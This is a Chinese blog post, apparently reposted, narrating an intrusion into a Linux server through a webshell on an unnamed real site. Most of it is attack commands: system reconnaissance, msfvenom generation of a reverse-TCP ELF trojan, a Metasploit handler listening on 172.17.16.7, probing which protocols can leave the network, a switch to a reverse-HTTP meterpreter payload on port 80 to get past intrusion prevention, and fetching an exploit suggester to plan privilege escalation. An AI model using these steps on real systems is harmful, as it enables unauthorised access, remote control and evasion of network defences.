对某站webshell的linux主机一次内网渗透

对某站webshell的linux主机一次内网渗透_第1张图片

这边是我狗头兄弟的一篇文章,还是我帮他发了吧。

这里拿到台linux主机

对某站webshell的linux主机一次内网渗透_第2张图片

我们来对他进行进一步的操作 先信息收集一波

whoami

查看权限

 

查看到他是个www权限  权限比较低

netstat -an

查看 端口连接情况

对某站webshell的linux主机一次内网渗透_第3张图片

 

也可以查看tcp连接的情况  根据这个也可以初步判断tcp能不能出网

uname -an

查看linux内核版本

 

64位的linux主机

ps

查看进程

对某站webshell的linux主机一次内网渗透_第4张图片

 

进程的运行信息不是很多

cat /etc/issue

查看系统版本

 

kernel 系统

现在我们先来上马

刚刚看到我们的tcp是可以连接外网ip的说明他的ip是互通的 我们创建应该elf的马 让 服务器执行

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

生成elf木马

攻击机器 vps:

msfconsole use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 172.17.16.7

set lport 4444

蚁剑 虚拟终端 上传elf木马上去  如果上传不了  可以通过wget的方式来下载elf木马到linux主机下

这里我们是上传完成的  无阻碍

chmod +x 1.elf ./1.elf

执行  我们这里可以看到msf里面已经是建立起了会话  就显示了建立一下会话断开了

起初判断是防火墙拦截了 但是防火墙拦截不可能会建立起来会话 ,应该是直接被过滤,

所以我们这里判断是ips/ids拦截了。

如果说常用的tcp连接不了的话我们这里还要再判断他的出网问题

先来判断 tcp的出网情况  上传一个nc  我们这里编译安装失败了 不知道说明原因 但是刚刚的tcp反弹shell的马 已经建立不起来 所以我们这忽略tcp

判断imcp :

 ping www.baidu,com >>1.txt  cat 1.txt

查看情况可以ping通

判断http :

curl http://www.baidu.com

对某站webshell的linux主机一次内网渗透_第5张图片

 

这里看到是可以出网的

判断dns:

nslookup www.baidu.com

 这里没安装dig 和nslookup 就不安装了  动静太大

对某站webshell的linux主机一次内网渗透_第6张图片

 

可以看到2个协议是可以出网的  我们先来试试 http  加载msf  http反弹shell模块 然后指定端口80

msfconsole use exploit/multi/handler

set payload linux/x64/meterpreter_reverse_http

set lhost 172.17.16.7

set lport 80

run -j

成功连接会话

对某站webshell的linux主机一次内网渗透_第7张图片

 

由于是www权限我们要对他进行提权操作

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

远程下载提权检测工具

chmod +x les.sh ./les.sh

对某站webshell的linux主机一次内网渗透_第8张图片

 

可以看到还是存在很多提权漏洞的 但是 linux的主机 不建议提权 Linux主机以内核提权为主  ,容易崩

转载请注明:Adminxe's Blog » 对某站webshell的linux主机一次内网渗透

你可能感兴趣的:(对某站webshell的linux主机一次内网渗透)